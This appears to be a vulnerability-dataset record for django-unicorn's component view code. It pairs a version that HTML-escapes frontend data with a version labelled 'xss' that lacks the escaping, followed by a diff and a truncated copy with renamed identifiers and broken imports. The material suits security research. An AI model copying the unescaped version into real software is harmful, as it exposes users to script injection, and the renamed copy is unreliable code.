def hydrate(self):
"""
Hook that gets called when the component's data is hydrated.
"""
pass
def complete(self):
"""
Hook that gets called after all component methods are executed.
"""
pass
def rendered(self, html):
"""
Hook that gets called after the component has been rendered.
"""
pass
def parent_rendered(self, html):
"""
Hook that gets called after the component's parent has been rendered.
"""
pass
def updating(self, name, value):
"""
Hook that gets called when a component's data is about to get updated.
"""
pass
def updated(self, name, value):
"""
Hook that gets called when a component's data is updated.
"""
pass
def calling(self, name, args):
"""
Hook that gets called when a component's method is about to get called.
"""
pass
def called(self, name, args):
"""
Hook that gets called when a component's method is called.
"""
pass
@timed
def render(self, init_js=False) -> str:
"""
Renders a UnicornView component with the public properties available. Delegates to a
UnicornTemplateResponse to actually render a response.
Args:
param init_js: Whether or not to include the Javascript required to initialize the component.
"""
response = self.render_to_response(
context=self.get_context_data(), component=self, init_js=init_js,
)
# render_to_response() could only return a HttpResponse, so check for render()
if hasattr(response, "render"):
response.render()
rendered_component = response.content.decode("utf-8")
# Set the current component as a child of the parent if there is a parent
# If no parent, mark that the component has its children set.
# This works because the nested (internal) components get rendered first before the parent,
# so once we hit a component without a parent we know all of the children have been rendered correctly
# TODO: This might fall apart with a third layer of nesting components
if self.parent:
if not self.parent._children_set:
self.parent.children.append(self)
else:
self._children_set = True
return rendered_component
@timed
def get_frontend_context_variables(self) -> str:
"""
Get publicly available properties and output them in a string-encoded JSON object.
"""
frontend_context_variables = {}
attributes = self._attributes()
frontend_context_variables.update(attributes)
# Remove any field in `javascript_exclude` from `frontend_context_variables`
if hasattr(self, "Meta") and hasattr(self.Meta, "javascript_exclude"):
if isinstance(self.Meta.javascript_exclude, Sequence):
for field_name in self.Meta.javascript_exclude:
if field_name in frontend_context_variables:
del frontend_context_variables[field_name]
safe_fields = []
# Keep a list of fields that are safe to not sanitize from `frontend_context_variables`
if hasattr(self, "Meta") and hasattr(self.Meta, "safe"):
if isinstance(self.Meta.safe, Sequence):
for field_name in self.Meta.safe:
if field_name in frontend_context_variables:
safe_fields.append(field_name)
# Add cleaned values to `frontend_content_variables` based on the widget in form's fields
form = self._get_form(attributes)
if form:
form.is_valid()
for key in attributes.keys():
if key in form.fields:
field = form.fields[key]
if key in form.cleaned_data:
cleaned_value = form.cleaned_data[key]
value = field.widget.format_value(cleaned_value)
# Don't update the frontend variable if the only change is
# stripping off the whitespace from the field value
# https://docs.djangoproject.com/en/stable/ref/forms/fields/#django.forms.CharField.strip
if (
not hasattr(frontend_context_variables[key], "strip")
or frontend_context_variables[key].strip() != value
):
frontend_context_variables[key] = value
for (
frontend_context_variable_key,
frontend_context_variable_value,
) in frontend_context_variables.items():
if (
isinstance(frontend_context_variable_value, str)
and frontend_context_variable_key not in safe_fields
):
frontend_context_variables[frontend_context_variable_key] = escape(
frontend_context_variable_value
)
encoded_frontend_context_variables = serializer.dumps(
frontend_context_variables
)
return encoded_frontend_context_variables
@timed
def _get_form(self, data):
if hasattr(self, "form_class"):
try:
form = self.form_class(data)
form.is_valid()
return form
except Exception as e:
logger.exception(e)
@timed
def get_context_data(self, **kwargs):
"""
Overrides the standard `get_context_data` to add in publicly available
properties and methods.
"""
context = super().get_context_data(**kwargs)
attributes = self._attributes()
context.update(attributes)
context.update(self._methods())
context.update({"unicorn": {"errors": self.errors}})
return context
@timed
def is_valid(self, model_names: List = None) -> bool:
return len(self.validate(model_names).keys()) == 0
@timed
def validate(self, model_names: List = None) -> Dict:
"""
Validates the data using the `form_class` set on the component.
Args:
model_names: Only include validation errors for specified fields. If none, validate everything.
"""
# TODO: Handle form.non_field_errors()?
if self._validate_called:
return self.errors
self._validate_called = True
data = self._attributes()
form = self._get_form(data)
if form:
form_errors = form.errors.get_json_data(escape_html=True)
# This code is confusing, but handles this use-case:
# the component has two models, one that starts with an error and one
# that is valid. Validating the valid one should not show an error for
# the invalid one. Only after the invalid field is updated, should the
# error show up and persist, even after updating the valid form.
if self.errors:
keys_to_remove = []
for key, value in self.errors.items():
if key in form_errors:
self.errors[key] = value
else:
keys_to_remove.append(key)
for key in keys_to_remove:
self.errors.pop(key)
if model_names is not None:
for key, value in form_errors.items():
if key in model_names:
self.errors[key] = value
else:
self.errors.update(form_errors)
return self.errors
@timed
def _attribute_names(self) -> List[str]:
"""
Gets publicly available attribute names. Cached in `_attribute_names_cache`.
"""
non_callables = [
member[0] for member in inspect.getmembers(self, lambda x: not callable(x))
]
attribute_names = [name for name in non_callables if self._is_public(name)]
return attribute_names
@timed
def _attributes(self) -> Dict[str, Any]:
"""
Get publicly available attributes and their values from the component.
"""
attribute_names = self._attribute_names_cache
attributes = {}
for attribute_name in attribute_names:
attributes[attribute_name] = getattr(self, attribute_name)
return attributes
@timed
def _set_property(self, name, value):
# Get the correct value type by using the form if it is available
data = self._attributes()
data[name] = value
form = self._get_form(data)
if form and name in form.fields and name in form.cleaned_data:
# The Django form CharField validator will remove whitespace
# from the field value. Ignore that update if it's the
# only thing different from the validator
# https://docs.djangoproject.com/en/stable/ref/forms/fields/#django.forms.CharField.strip
if not hasattr(value, "strip") or form.cleaned_data[name] != value.strip():
value = form.cleaned_data[name]
updating_function_name = f"updating_{name}"
if hasattr(self, updating_function_name):
getattr(self, updating_function_name)(value)
try:
setattr(self, name, value)
updated_function_name = f"updated_{name}"
if hasattr(self, updated_function_name):
getattr(self, updated_function_name)(value)
except AttributeError as e:
raise
@timed
def _methods(self) -> Dict[str, Callable]:
"""
Get publicly available method names and their functions from the component.
Cached in `_methods_cache`.
"""
if self._methods_cache:
return self._methods_cache
member_methods = inspect.getmembers(self, inspect.ismethod)
public_methods = [
method for method in member_methods if self._is_public(method[0])
]
methods = {k: v for (k, v) in public_methods}
self._methods_cache = methods
return methods
@timed
def _set_hook_methods_cache(self) -> None:
"""
Caches the updating/updated attribute function names defined on the component.
"""
self._hook_methods_cache = []
for attribute_name in self._attribute_names_cache:
updating_function_name = f"updating_{attribute_name}"
updated_function_name = f"updated_{attribute_name}"
hook_function_names = [updating_function_name, updated_function_name]
for function_name in hook_function_names:
if hasattr(self, function_name):
self._hook_methods_cache.append(function_name)
@timed
def _set_resettable_attributes_cache(self) -> None:
"""
Caches the attributes that are "resettable" in `_resettable_attributes_cache`.
Cache is a dictionary with key: attribute name; value: pickled attribute value
Examples:
- `UnicornField`
- Django Models without a defined pk
"""
self._resettable_attributes_cache = {}
for attribute_name, attribute_value in self._attributes().items():
if isinstance(attribute_value, UnicornField):
self._resettable_attributes_cache[attribute_name] = pickle.dumps(
attribute_value
)
elif isinstance(attribute_value, Model):
if not attribute_value.pk:
if attribute_name not in self._resettable_attributes_cache:
try:
self._resettable_attributes_cache[
attribute_name
] = pickle.dumps(attribute_value)
except pickle.PickleError:
logger.warn(
f"Caching '{attribute_name}' failed because it could not be pickled."
)
pass
def _is_public(self, name: str) -> bool:
"""
Determines if the name should be sent in the context.
"""
# Ignore some standard attributes from TemplateView
protected_names = (
"render",
"request",
"args",
"kwargs",
"content_type",
"extra_context",
"http_method_names",
"template_engine",
"template_name",
"dispatch",
"id",
"get",
"get_context_data",
"get_template_names",
"render_to_response",
"http_method_not_allowed",
"options",
"setup",
"fill",
# Component methods
"component_id",
"component_name",
"component_key",
"reset",
"mount",
"hydrate",
"updating",
"update",
"calling",
"called",
"complete",
"rendered",
"parent_rendered",
"validate",
"is_valid",
"get_frontend_context_variables",
"errors",
"updated",
"parent",
"children",
"call",
"calls",
"component_cache_key",
)
excludes = []
if hasattr(self, "Meta") and hasattr(self.Meta, "exclude"):
if isinstance(self.Meta.exclude, Sequence):
excludes = self.Meta.exclude
return not (
name.startswith("_")
or name in protected_names
or name in self._hook_methods_cache
or name in excludes
)
@staticmethod
@timed
def create(
component_id: str,
component_name: str,
component_key: str = "",
parent: "UnicornView" = None,
request: HttpRequest = None,
use_cache=True,
kwargs: Dict[str, Any] = {},
) -> "UnicornView":
"""
Find and instantiate a component class based on `component_name`.
Args:
param component_id: Id of the component. Required.
param component_name: Name of the component. Used to locate the correct `UnicornView`
component class and template if necessary. Required.
param component_key: Key of the component to allow multiple components of the same name
to be differentiated. Optional.
param parent: The parent component of the current component.
param kwargs: Keyword arguments for the component passed in from the template. Defaults to `{}`.
Returns:
Instantiated `UnicornView` component.
Raises `ComponentLoadError` if the component could not be loaded.
"""
assert component_id, "Component id is required"
assert component_name, "Component name is required"
@timed
def _get_component_class(
module_name: str, class_name: str
) -> Type[UnicornView]:
"""
Imports a component based on module and class name.
"""
module = importlib.import_module(module_name)
component_class = getattr(module, class_name)
return component_class
cache = caches[get_cache_alias()]
component_cache_key = f"unicorn:component:{component_id}"
cached_component = cache.get(component_cache_key)
if cached_component:
# Get the newest version of the parent from cache if it is available
# This needs to happen for Django cache because instances is pickled, so
# a change in the view won't be reflected automatically (like with the module
# cache) so it needs to be retrieved manually.
if cached_component.parent:
cached_parent_component = cache.get(
cached_component.parent.component_cache_key
)
if cached_parent_component:
cached_component.parent = cached_parent_component
cached_component.parent.setup(request)
else:
cached_component = constructed_views_cache.get(component_id)
if use_cache and cached_component:
# Note that `hydrate()` and `complete` don't need to be called here
# because this path only happens for re-rendering from the view
cached_component.setup(request)
cached_component._validate_called = False
cached_component.calls = []
logger.debug(f"Retrieve {component_id} from constructed views cache")
return cached_component
if component_id in views_cache:
(component_class, parent, kwargs) = views_cache[component_id]
component = construct_component(
component_class=component_class,
component_id=component_id,
component_name=component_name,
component_key=component_key,
parent=parent,
request=request,
**kwargs,
)
logger.debug(f"Retrieve {component_id} from views cache")
return component
locations = []
if component_name in location_cache:
locations.append(location_cache[component_name])
else:
locations = get_locations(component_name)
# Store the last exception that got raised while looking for a component in case it is useful context
last_exception: Union[
Optional[ModuleNotFoundError], Optional[AttributeError]
] = None
for (class_name, module_name) in locations:
try:
component_class = _get_component_class(module_name, class_name)
component = construct_component(
component_class=component_class,
component_id=component_id,
component_name=component_name,
component_key=component_key,
parent=parent,
request=request,
**kwargs,
)
# Put the location for the component name in a module cache
location_cache[component_name] = (class_name, module_name)
# Put the component's class in a module cache
views_cache[component_id] = (component_class, parent, kwargs)
# Put the instantiated component into a module cache and the Django cache
cacheable_component = None
try:
cacheable_component = get_cacheable_component(component)
except UnicornCacheError as e:
logger.warning(e)
if cacheable_component:
if COMPONENTS_MODULE_CACHE_ENABLED:
constructed_views_cache[component_id] = cacheable_component
cache.set(
cacheable_component.component_cache_key, cacheable_component
)
return component
except ModuleNotFoundError as e:
last_exception = e
except AttributeError as e:
last_exception = e
raise ComponentLoadError(
f"'{component_name}' component could not be loaded: {last_exception}"
) from last_exception
| import importlib
import inspect
import logging
import pickle
import sys
from typing import Any, Callable, Dict, List, Optional, Sequence, Type, Union
from django.conf import settings
from django.core.cache import caches
from django.core.exceptions import ImproperlyConfigured
from django.db.models import Model
from django.http import HttpRequest
from django.views.generic.base import TemplateView
from cachetools.lru import LRUCache
from django_unicorn.settings import get_cache_alias
from .. import serializer
from ..decorators import timed
from ..errors import ComponentLoadError, UnicornCacheError
from ..settings import get_setting
from ..utils import get_cacheable_component
from .fields import UnicornField
from .unicorn_template_response import UnicornTemplateResponse
logger = logging.getLogger(__name__)
# TODO: Make maxsize configurable
location_cache = LRUCache(maxsize=100)
# Module cache to store the found component class by id
views_cache = LRUCache(maxsize=100)
# Module cache for constructed component classes
# This can create a subtle race condition so a more long-term solution needs to be found
constructed_views_cache = LRUCache(maxsize=100)
COMPONENTS_MODULE_CACHE_ENABLED = "pytest" not in sys.modules
def convert_to_snake_case(s: str) -> str:
# TODO: Better handling of dash->snake
return s.replace("-", "_")
def convert_to_pascal_case(s: str) -> str:
# TODO: Better handling of dash/snake->pascal-case
s = convert_to_snake_case(s)
return "".join(word.title() for word in s.split("_"))
def get_locations(component_name):
locations = []
if "." in component_name:
# Handle component names that specify a folder structure
component_name = component_name.replace("/", ".")
# Handle fully-qualified component names (e.g. `project.unicorn.HelloWorldView`)
class_name = component_name.split(".")[-1:][0]
module_name = component_name.replace("." + class_name, "")
locations.append((class_name, module_name))
# Assume if it ends with "View", then we don't need to add other
if component_name.endswith("View") or component_name.endswith("Component"):
return locations
# Handle component names that specify a folder structure
component_name = component_name.replace("/", ".")
# Use conventions to find the component class
class_name = convert_to_pascal_case(component_name)
if "." in class_name:
if class_name.split(".")[-1:]:
class_name = class_name.split(".")[-1:][0]
class_name = f"{class_name}View"
module_name = convert_to_snake_case(component_name)
unicorn_apps = get_setting("APPS", settings.INSTALLED_APPS)
assert (
isinstance(unicorn_apps, list)
or isinstance(unicorn_apps, tuple)
or isinstance(unicorn_apps, set)
), "APPS is expected to be a list, tuple or set"
for app in unicorn_apps:
# Handle an installed app that actually points to an app config
if ".apps." in app:
app_config_idx = app.rindex(".apps.")
app = app[:app_config_idx]
app_module_name = f"{app}.components.{module_name}"
locations.append((class_name, app_module_name))
return locations
@timed
def construct_component(
component_class,
component_id,
component_name,
component_key,
parent,
request,
**kwargs,
):
"""
Constructs a class instance.
"""
component = component_class(
component_id=component_id,
component_name=component_name,
component_key=component_key,
parent=parent,
request=request,
**kwargs,
)
component.calls = []
component.children = []
component._children_set = False
component.mount()
component.hydrate()
component.complete()
component._validate_called = False
return component
class UnicornView(TemplateView):
response_class = UnicornTemplateResponse
component_name: str = ""
component_key: str = ""
request = None
parent = None
children = []
# Caches to reduce the amount of time introspecting the class
_methods_cache: Dict[str, Callable] = {}
_attribute_names_cache: List[str] = []
_hook_methods_cache: List[str] = []
# Dictionary with key: attribute name; value: pickled attribute value
_resettable_attributes_cache: Dict[str, Any] = {}
# JavaScript method calls
calls = []
def __init__(self, **kwargs):
super().__init__(**kwargs)
assert self.component_name, "Component name is required"
if "id" in kwargs and kwargs["id"]:
# Sometimes the component_id is initially in kwargs["id"]
self.component_id = kwargs["id"]
assert hasattr(self, "component_id"), "Component id is required"
assert self.component_id, "Component id is required"
self.component_cache_key = f"unicorn:component:{self.component_id}"
if "request" in kwargs:
self.setup(kwargs["request"])
if "parent" in kwargs:
self.parent = kwargs["parent"]
self._init_script: str = ""
self._children_set = False
self._validate_called = False
self.errors = {}
self._set_default_template_name()
self._set_caches()
@timed
def _set_default_template_name(self) -> None:
"""
Sets a default template name based on component's name if necessary.
"""
get_template_names_is_valid = False
try:
# Check for get_template_names by explicitly calling it since it
# is defined in TemplateResponseMixin, but can throw ImproperlyConfigured.
self.get_template_names()
get_template_names_is_valid = True
except ImproperlyConfigured:
pass
if not self.template_name and not get_template_names_is_valid:
# Convert component name with a dot to a folder structure
template_name = self.component_name.replace(".", "/")
self.template_name = f"unicorn/{template_name}.html"
@timed
def _set_caches(self) -> None:
"""
Setup some initial "caches" to prevent Python from having to introspect
a component UnicornView for methods and properties multiple times.
"""
self._attribute_names_cache = self._attribute_names()
self._set_hook_methods_cache()
self._methods_cache = self._methods()
self._set_resettable_attributes_cache()
@timed
def reset(self):
for (
attribute_name,
pickled_value,
) in self._resettable_attributes_cache.items():
try:
attribute_value = pickle.loads(pickled_value)
self._set_property(attribute_name, attribute_value)
except TypeError:
logger.warn(
f"Resetting '{attribute_name}' attribute failed because it could not be constructed."
)
pass
except pickle.PickleError:
logger.warn(
f"Resetting '{attribute_name}' attribute failed because it could not be de-pickled."
)
pass
def call(self, function_name, *args):
"""
Add a JavaScript method name and arguments to be called after the component is rendered.
"""
self.calls.append({"fn": function_name, "args": args})
def mount(self):
"""
Hook that gets called when the component is first created.
"""
pass
def hydrate(self):
"""
Hook that gets called when the component's data is hydrated.
"""
pass
def complete(self):
"""
Hook that gets called after all component methods are executed.
"""
pass
def rendered(self, html):
"""
Hook that gets called after the component has been rendered.
"""
pass
def parent_rendered(self, html):
"""
Hook that gets called after the component's parent has been rendered.
"""
pass
def updating(self, name, value):
"""
Hook that gets called when a component's data is about to get updated.
"""
pass
def updated(self, name, value):
"""
Hook that gets called when a component's data is updated.
"""
pass
def calling(self, name, args):
"""
Hook that gets called when a component's method is about to get called.
"""
pass
def called(self, name, args):
"""
Hook that gets called when a component's method is called.
"""
pass
@timed
def render(self, init_js=False) -> str:
"""
Renders a UnicornView component with the public properties available. Delegates to a
UnicornTemplateResponse to actually render a response.
Args:
param init_js: Whether or not to include the Javascript required to initialize the component.
"""
response = self.render_to_response(
context=self.get_context_data(), component=self, init_js=init_js,
)
# render_to_response() could only return a HttpResponse, so check for render()
if hasattr(response, "render"):
response.render()
rendered_component = response.content.decode("utf-8")
# Set the current component as a child of the parent if there is a parent
# If no parent, mark that the component has its children set.
# This works because the nested (internal) components get rendered first before the parent,
# so once we hit a component without a parent we know all of the children have been rendered correctly
# TODO: This might fall apart with a third layer of nesting components
if self.parent:
if not self.parent._children_set:
self.parent.children.append(self)
else:
self._children_set = True
return rendered_component
@timed
def get_frontend_context_variables(self) -> str:
"""
Get publicly available properties and output them in a string-encoded JSON object.
"""
frontend_context_variables = {}
attributes = self._attributes()
frontend_context_variables.update(attributes)
# Remove any field in `javascript_exclude` from `frontend_context_variables`
if hasattr(self, "Meta") and hasattr(self.Meta, "javascript_exclude"):
if isinstance(self.Meta.javascript_exclude, Sequence):
for field_name in self.Meta.javascript_exclude:
if field_name in frontend_context_variables:
del frontend_context_variables[field_name]
# Add cleaned values to `frontend_content_variables` based on the widget in form's fields
form = self._get_form(attributes)
if form:
form.is_valid()
for key in attributes.keys():
if key in form.fields:
field = form.fields[key]
if key in form.cleaned_data:
cleaned_value = form.cleaned_data[key]
value = field.widget.format_value(cleaned_value)
# Don't update the frontend variable if the only change is
# stripping off the whitespace from the field value
# https://docs.djangoproject.com/en/stable/ref/forms/fields/#django.forms.CharField.strip
if (
not hasattr(frontend_context_variables[key], "strip")
or frontend_context_variables[key].strip() != value
):
frontend_context_variables[key] = value
encoded_frontend_context_variables = serializer.dumps(
frontend_context_variables
)
return encoded_frontend_context_variables
@timed
def _get_form(self, data):
if hasattr(self, "form_class"):
try:
form = self.form_class(data)
form.is_valid()
return form
except Exception as e:
logger.exception(e)
@timed
def get_context_data(self, **kwargs):
"""
Overrides the standard `get_context_data` to add in publicly available
properties and methods.
"""
context = super().get_context_data(**kwargs)
attributes = self._attributes()
context.update(attributes)
context.update(self._methods())
context.update({"unicorn": {"errors": self.errors}})
return context
@timed
def is_valid(self, model_names: List = None) -> bool:
return len(self.validate(model_names).keys()) == 0
@timed
def validate(self, model_names: List = None) -> Dict:
"""
Validates the data using the `form_class` set on the component.
Args:
model_names: Only include validation errors for specified fields. If none, validate everything.
"""
# TODO: Handle form.non_field_errors()?
if self._validate_called:
return self.errors
self._validate_called = True
data = self._attributes()
form = self._get_form(data)
if form:
form_errors = form.errors.get_json_data(escape_html=True)
# This code is confusing, but handles this use-case:
# the component has two models, one that starts with an error and one
# that is valid. Validating the valid one should not show an error for
# the invalid one. Only after the invalid field is updated, should the
# error show up and persist, even after updating the valid form.
if self.errors:
keys_to_remove = []
for key, value in self.errors.items():
if key in form_errors:
self.errors[key] = value
else:
keys_to_remove.append(key)
for key in keys_to_remove:
self.errors.pop(key)
if model_names is not None:
for key, value in form_errors.items():
if key in model_names:
self.errors[key] = value
else:
self.errors.update(form_errors)
return self.errors
@timed
def _attribute_names(self) -> List[str]:
"""
Gets publicly available attribute names. Cached in `_attribute_names_cache`.
"""
non_callables = [
member[0] for member in inspect.getmembers(self, lambda x: not callable(x))
]
attribute_names = [name for name in non_callables if self._is_public(name)]
return attribute_names
@timed
def _attributes(self) -> Dict[str, Any]:
"""
Get publicly available attributes and their values from the component.
"""
attribute_names = self._attribute_names_cache
attributes = {}
for attribute_name in attribute_names:
attributes[attribute_name] = getattr(self, attribute_name)
return attributes
@timed
def _set_property(self, name, value):
# Get the correct value type by using the form if it is available
data = self._attributes()
data[name] = value
form = self._get_form(data)
if form and name in form.fields and name in form.cleaned_data:
# The Django form CharField validator will remove whitespace
# from the field value. Ignore that update if it's the
# only thing different from the validator
# https://docs.djangoproject.com/en/stable/ref/forms/fields/#django.forms.CharField.strip
if not hasattr(value, "strip") or form.cleaned_data[name] != value.strip():
value = form.cleaned_data[name]
updating_function_name = f"updating_{name}"
if hasattr(self, updating_function_name):
getattr(self, updating_function_name)(value)
try:
setattr(self, name, value)
updated_function_name = f"updated_{name}"
if hasattr(self, updated_function_name):
getattr(self, updated_function_name)(value)
except AttributeError as e:
raise
@timed
def _methods(self) -> Dict[str, Callable]:
"""
Get publicly available method names and their functions from the component.
Cached in `_methods_cache`.
"""
if self._methods_cache:
return self._methods_cache
member_methods = inspect.getmembers(self, inspect.ismethod)
public_methods = [
method for method in member_methods if self._is_public(method[0])
]
methods = {k: v for (k, v) in public_methods}
self._methods_cache = methods
return methods
@timed
def _set_hook_methods_cache(self) -> None:
"""
Caches the updating/updated attribute function names defined on the component.
"""
self._hook_methods_cache = []
for attribute_name in self._attribute_names_cache:
updating_function_name = f"updating_{attribute_name}"
updated_function_name = f"updated_{attribute_name}"
hook_function_names = [updating_function_name, updated_function_name]
for function_name in hook_function_names:
if hasattr(self, function_name):
self._hook_methods_cache.append(function_name)
@timed
def _set_resettable_attributes_cache(self) -> None:
"""
Caches the attributes that are "resettable" in `_resettable_attributes_cache`.
Cache is a dictionary with key: attribute name; value: pickled attribute value
Examples:
- `UnicornField`
- Django Models without a defined pk
"""
self._resettable_attributes_cache = {}
for attribute_name, attribute_value in self._attributes().items():
if isinstance(attribute_value, UnicornField):
self._resettable_attributes_cache[attribute_name] = pickle.dumps(
attribute_value
)
elif isinstance(attribute_value, Model):
if not attribute_value.pk:
if attribute_name not in self._resettable_attributes_cache:
try:
self._resettable_attributes_cache[
attribute_name
] = pickle.dumps(attribute_value)
except pickle.PickleError:
logger.warn(
f"Caching '{attribute_name}' failed because it could not be pickled."
)
pass
def _is_public(self, name: str) -> bool:
"""
Determines if the name should be sent in the context.
"""
# Ignore some standard attributes from TemplateView
protected_names = (
"render",
"request",
"args",
"kwargs",
"content_type",
"extra_context",
"http_method_names",
"template_engine",
"template_name",
"dispatch",
"id",
"get",
"get_context_data",
"get_template_names",
"render_to_response",
"http_method_not_allowed",
"options",
"setup",
"fill",
# Component methods
"component_id",
"component_name",
"component_key",
"reset",
"mount",
"hydrate",
"updating",
"update",
"calling",
"called",
"complete",
"rendered",
"parent_rendered",
"validate",
"is_valid",
"get_frontend_context_variables",
"errors",
"updated",
"parent",
"children",
"call",
"calls",
"component_cache_key",
)
excludes = []
if hasattr(self, "Meta") and hasattr(self.Meta, "exclude"):
if isinstance(self.Meta.exclude, Sequence):
excludes = self.Meta.exclude
return not (
name.startswith("_")
or name in protected_names
or name in self._hook_methods_cache
or name in excludes
)
@staticmethod
@timed
def create(
component_id: str,
component_name: str,
component_key: str = "",
parent: "UnicornView" = None,
request: HttpRequest = None,
use_cache=True,
kwargs: Dict[str, Any] = {},
) -> "UnicornView":
"""
Find and instantiate a component class based on `component_name`.
Args:
param component_id: Id of the component. Required.
param component_name: Name of the component. Used to locate the correct `UnicornView`
component class and template if necessary. Required.
param component_key: Key of the component to allow multiple components of the same name
to be differentiated. Optional.
param parent: The parent component of the current component.
param kwargs: Keyword arguments for the component passed in from the template. Defaults to `{}`.
Returns:
Instantiated `UnicornView` component.
Raises `ComponentLoadError` if the component could not be loaded.
"""
assert component_id, "Component id is required"
assert component_name, "Component name is required"
@timed
def _get_component_class(
module_name: str, class_name: str
) -> Type[UnicornView]:
"""
Imports a component based on module and class name.
"""
module = importlib.import_module(module_name)
component_class = getattr(module, class_name)
return component_class
cache = caches[get_cache_alias()]
component_cache_key = f"unicorn:component:{component_id}"
cached_component = cache.get(component_cache_key)
if cached_component:
# Get the newest version of the parent from cache if it is available
# This needs to happen for Django cache because instances is pickled, so
# a change in the view won't be reflected automatically (like with the module
# cache) so it needs to be retrieved manually.
if cached_component.parent:
cached_parent_component = cache.get(
cached_component.parent.component_cache_key
)
if cached_parent_component:
cached_component.parent = cached_parent_component
cached_component.parent.setup(request)
else:
cached_component = constructed_views_cache.get(component_id)
if use_cache and cached_component:
# Note that `hydrate()` and `complete` don't need to be called here
# because this path only happens for re-rendering from the view
cached_component.setup(request)
cached_component._validate_called = False
cached_component.calls = []
logger.debug(f"Retrieve {component_id} from constructed views cache")
return cached_component
if component_id in views_cache:
(component_class, parent, kwargs) = views_cache[component_id]
component = construct_component(
component_class=component_class,
component_id=component_id,
component_name=component_name,
component_key=component_key,
parent=parent,
request=request,
**kwargs,
)
logger.debug(f"Retrieve {component_id} from views cache")
return component
locations = []
if component_name in location_cache:
locations.append(location_cache[component_name])
else:
locations = get_locations(component_name)
# Store the last exception that got raised while looking for a component in case it is useful context
last_exception: Union[
Optional[ModuleNotFoundError], Optional[AttributeError]
] = None
for (class_name, module_name) in locations:
try:
component_class = _get_component_class(module_name, class_name)
component = construct_component(
component_class=component_class,
component_id=component_id,
component_name=component_name,
component_key=component_key,
parent=parent,
request=request,
**kwargs,
)
# Put the location for the component name in a module cache
location_cache[component_name] = (class_name, module_name)
# Put the component's class in a module cache
views_cache[component_id] = (component_class, parent, kwargs)
# Put the instantiated component into a module cache and the Django cache
cacheable_component = None
try:
cacheable_component = get_cacheable_component(component)
except UnicornCacheError as e:
logger.warning(e)
if cacheable_component:
if COMPONENTS_MODULE_CACHE_ENABLED:
constructed_views_cache[component_id] = cacheable_component
cache.set(
cacheable_component.component_cache_key, cacheable_component
)
return component
except ModuleNotFoundError as e:
last_exception = e
except AttributeError as e:
last_exception = e
raise ComponentLoadError(
f"'{component_name}' component could not be loaded: {last_exception}"
) from last_exception
| xss | {
"code": [
"from django.utils.html import conditional_escape",
" safe_fields = []",
" if hasattr(self, \"Meta\") and hasattr(self.Meta, \"safe\"):",
" if isinstance(self.Meta.safe, Sequence):",
" for field_name in self.Meta.safe:",
" if field_name in frontend_context_variables:",
" safe_fields.append(field_name)",
" for (",
" frontend_context_variable_key,",
" frontend_context_variable_value,",
" ) in frontend_context_variables.items():",
" if (",
" isinstance(frontend_context_variable_value, str)",
" and frontend_context_variable_key not in safe_fields",
" ):",
" frontend_context_variables[frontend_context_variable_key] = escape(",
" frontend_context_variable_value",
" )"
],
"line_no": [
13,
344,
346,
347,
348,
349,
350,
375,
376,
377,
378,
379,
380,
381,
382,
383,
384,
385
]
} | {
"code": [],
"line_no": []
} | import importlib
import inspect
import logging
import pickle
import .sys
from typing import Any, Callable, Dict, List, Optional, Sequence, Type, Union
from django.conf import .settings
from django.core.cache import .caches
from django.core.exceptions import ImproperlyConfigured
from django.db.models import Model
from django.http import HttpRequest
from django.utils.html import conditional_escape
from django.views.generic.base import TemplateView
from cachetools.lru import LRUCache
from django_unicorn.settings import get_cache_alias
from .. import .serializer
from ..decorators import timed
from ..errors import ComponentLoadError, UnicornCacheError
from ..settings import get_setting
from ..utils import get_cacheable_component
from .fields import UnicornField
from .unicorn_template_response import UnicornTemplateResponse
VAR_0 = logging.getLogger(__name__)
VAR_1 = LRUCache(maxsize=100)
VAR_2 = LRUCache(maxsize=100)
VAR_3 = LRUCache(maxsize=100)
VAR_4 = "pytest" not in sys.modules
def FUNC_0(VAR_5: str) -> str:
return VAR_5.replace("-", "_")
def FUNC_1(VAR_5: str) -> str:
VAR_5 = FUNC_0(VAR_5)
return "".join(word.title() for word in VAR_5.split("_"))
def FUNC_2(VAR_6):
VAR_13 = []
if "." in VAR_6:
VAR_6 = VAR_6.replace("/", ".")
VAR_14 = VAR_6.split(".")[-1:][0]
VAR_15 = VAR_6.replace("." + VAR_14, "")
VAR_13.append((VAR_14, VAR_15))
if VAR_6.endswith("View") or VAR_6.endswith("Component"):
return VAR_13
VAR_6 = VAR_6.replace("/", ".")
VAR_14 = FUNC_1(VAR_6)
if "." in VAR_14:
if VAR_14.split(".")[-1:]:
VAR_14 = VAR_14.split(".")[-1:][0]
VAR_14 = f"{VAR_14}View"
VAR_15 = FUNC_0(VAR_6)
VAR_16 = get_setting("APPS", settings.INSTALLED_APPS)
assert (
isinstance(VAR_16, list)
or isinstance(VAR_16, tuple)
or isinstance(VAR_16, set)
), "APPS is expected to be a list, tuple or set"
for VAR_52 in VAR_16:
if ".apps." in VAR_52:
VAR_51 = VAR_52.rindex(".apps.")
VAR_52 = app[:VAR_51]
VAR_30 = f"{VAR_52}.components.{VAR_15}"
VAR_13.append((VAR_14, VAR_30))
return VAR_13
@timed
def FUNC_3(
VAR_7,
VAR_8,
VAR_6,
VAR_9,
VAR_10,
VAR_11,
**VAR_12,
):
VAR_17 = VAR_7(
VAR_8=component_id,
VAR_6=component_name,
VAR_9=component_key,
VAR_10=parent,
VAR_11=request,
**VAR_12,
)
VAR_17.calls = []
VAR_17.children = []
VAR_17._children_set = False
VAR_17.mount()
VAR_17.hydrate()
VAR_17.complete()
VAR_17._validate_called = False
return VAR_17
class CLASS_0(TemplateView):
VAR_18 = UnicornTemplateResponse
VAR_6: str = ""
VAR_9: str = ""
VAR_11 = None
VAR_10 = None
VAR_19 = []
_methods_cache: Dict[str, Callable] = {}
_attribute_names_cache: List[str] = []
_hook_methods_cache: List[str] = []
_resettable_attributes_cache: Dict[str, Any] = {}
calls = []
def __init__(self, **VAR_12):
super().__init__(**VAR_12)
assert self.component_name, "Component VAR_24 is required"
if "id" in VAR_12 and VAR_12["id"]:
self.component_id = VAR_12["id"]
assert hasattr(self, "component_id"), "Component id is required"
assert self.component_id, "Component id is required"
self.component_cache_key = f"unicorn:VAR_17:{self.component_id}"
if "request" in VAR_12:
self.setup(VAR_12["request"])
if "parent" in VAR_12:
self.parent = VAR_12["parent"]
self._init_script: str = ""
self._children_set = False
self._validate_called = False
self.errors = {}
self._set_default_template_name()
self._set_caches()
@timed
def FUNC_4(self) -> None:
VAR_31 = False
try:
self.get_template_names()
VAR_31 = True
except ImproperlyConfigured:
pass
if not self.template_name and not VAR_31:
VAR_53 = self.component_name.replace(".", "/")
self.template_name = f"unicorn/{VAR_53}.html"
@timed
